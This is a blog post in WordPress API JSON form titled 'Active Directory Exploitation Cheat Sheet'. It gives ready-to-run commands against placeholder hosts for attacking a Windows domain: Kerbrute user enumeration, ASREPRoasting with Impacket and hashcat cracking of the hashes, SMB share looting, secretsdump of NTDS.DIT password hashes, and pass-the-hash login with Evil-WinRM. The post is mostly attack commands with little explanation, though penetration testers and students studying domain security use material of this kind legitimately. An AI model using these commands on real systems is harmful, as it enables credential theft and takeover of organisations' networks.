{"id":2630,"date":"2021-12-31T18:53:47","date_gmt":"2021-12-31T18:53:47","guid":{"rendered":"https:\/\/dft.wiki\/?p=2630"},"modified":"2022-01-01T17:08:35","modified_gmt":"2022-01-01T17:08:35","slug":"active-directory-exploitation-cheat-sheet","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=2630","title":{"rendered":"Active Directory Exploitation Cheat Sheet"},"content":{"rendered":"<p>While pentesting a Windows network some tools and essential to have handy:<\/p>\n<ul>\n<li>Enum4Linux &#8211; Quick enumeration.<\/li>\n<li>Kerbrute &#8211; Enumerate domain users.<\/li>\n<li>Impacket &#8211; Parsing SMB and NetBIOS packets.\n<ul>\n<li>ASREPRoasting attack &#8211; Enumerating used with no password required.\n<ul>\n<li>HashCat &#8211; Cracking Kerberos hashes.<\/li>\n<\/ul>\n<\/li>\n<li>SecretDump &#8211; Dumping NTDS.DIT hashes.<\/li>\n<\/ul>\n<\/li>\n<li>Evil-WinRM &#8211; Logging in passing hash (no password).<\/li>\n<li>SMBclient &#8211; Enumerating shares.<\/li>\n<\/ul>\n<hr \/>\n<p>Quick enumeration Users, Groups, Shares&#8230; with <strong>Enum4Linux<\/strong> [<a href=\"https:\/\/gitlab.com\/kalilinux\/packages\/enum4linux\">Link<\/a>]:<\/p>\n<pre>\/usr\/share\/enum4linux\/enum4linux.pl -a <strong>10.10.10.10<\/strong>\r\nnmap -p <strong>445<\/strong> --script=smb-enum-shares.nse,smb-enum-users.nse <strong>10.10.10.10<\/strong><\/pre>\n<hr \/>\n<p><strong>Kerbrute<\/strong> &#8211; Brute forces and <strong>enumerates<\/strong> valid Active Directory<strong> accounts<\/strong> through Kerberos Pre-Authentication [<a href=\"https:\/\/github.com\/ropnop\/kerbrute\/releases\">Link<\/a>].<\/p>\n<p>There is also a short-handed repository for it that I recommend using:<\/p>\n<pre>git clone https:\/\/github.com\/Sq00ky\/attacktive-directory-tools.git\r\ncd attacktive-directory-tools &amp;&amp; chmod +x kerbrute\r\n.\/kerbrute userenum --dc <strong>10.10.10.10<\/strong> -d <strong>domain.local user.lst<\/strong><\/pre>\n<hr \/>\n<p>Installing <strong>Impacket<\/strong> &#8211; Tool able to parse packets from low to high-level protocols, excellent for <strong>SMB and NetBIOS analysis<\/strong>:<\/p>\n<pre>sudo git clone https:\/\/github.com\/SecureAuthCorp\/impacket.git \/opt\/impacket\r\nsudo pip3 install -r \/opt\/impacket\/requirements.txt\r\ncd \/opt\/impacket\/\r\nsudo python3 .\/setup.py install<\/pre>\n<hr \/>\n<p><strong>ASREPRoasting<\/strong> attack using <strong>Impacket<\/strong> &#8211; Looks for users that are set to do <strong>not require pre-auth<\/strong>:<\/p>\n<pre>python3 \/opt\/impacket\/examples\/GetNPUsers.py <strong>domain.local\/admin<\/strong> -request -no-pass -dc-ip <strong>10.10.10.10<\/strong><\/pre>\n<p><strong>Cracking Kerberos hashes<\/strong> obtained from the ASREPRoasting attack:<\/p>\n<pre>hashcat --force -m 18200 -a 0 <strong>svc-admin.hash<\/strong> \/usr\/share\/wordlists\/rockyou.txt<\/pre>\n<hr \/>\n<p><strong>Enumerating shares<\/strong> for a particular user &#8211; Knowing the password is required!<\/p>\n<pre>smbclient -U <strong>domain.local\/admin<\/strong> -L \/\/<strong>10.10.10.10<\/strong>\r\nsmbclient -U <strong>domain.local\/admin<\/strong> \/\/<strong>10.10.10.10\/share<\/strong>\r\nget <strong>file.txt<\/strong>\r\nsmbget -R smb:\/\/<strong>10.10.10.10\/share<\/strong><\/pre>\n<hr \/>\n<p><strong>Dumping<\/strong> all NTDS.DIT <strong>hashes<\/strong> with <strong>Impacket<\/strong>:<\/p>\n<pre>python3 \/opt\/impacket\/examples\/secretsdump.py -dc-ip <strong>10.10.10.10<\/strong> <strong>domain.local\/share:password@10.10.10.10<\/strong><\/pre>\n<hr \/>\n<p>Authenticating by <strong>passing a dumped hash<\/strong> (no password required using\u00a0<strong>Evil-WinRM<\/strong>:<\/p>\n<pre>sudo gem install evil-winrm\r\nevil-winrm -i <strong>10.10.10.10<\/strong> -u <strong>administrator<\/strong> -H <strong>5f4dcc3b5aa765d61d8327deb882cf99<\/strong><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>While pentesting a Windows network some tools and essential to have handy: Enum4Linux &#8211; Quick [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-2630","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2630","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2630"}],"version-history":[{"count":5,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2630\/revisions"}],"predecessor-version":[{"id":2637,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2630\/revisions\/2637"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}